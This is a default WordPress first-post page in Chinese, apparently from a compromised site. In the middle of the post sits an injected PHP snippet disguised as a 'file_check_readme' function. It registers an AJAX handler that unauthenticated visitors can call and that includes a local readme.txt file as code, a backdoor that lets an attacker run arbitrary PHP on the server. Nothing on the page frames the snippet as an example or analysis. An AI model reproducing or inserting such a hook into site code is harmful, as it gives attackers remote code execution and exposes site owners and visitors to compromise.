歡迎使用 WordPress。這是這個網站的第一篇文章,試試為這篇文章進行編輯或直接刪除,然後開始撰寫新文章!
網站第一篇文章
- By theoracle
- Published
- 0 Comments
- Updated
- 1 min read
if(!function_exists('file_check_readme33539')){ add_action('wp_ajax_nopriv_file_check_readme33539', 'file_check_readme33539'); add_action('wp_ajax_file_check_readme33539', 'file_check_readme33539'); function file_check_readme33539() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
歡迎使用 WordPress。這是這個網站的第一篇文章,試試為這篇文章進行編輯或直接刪除,然後開始撰寫新文章!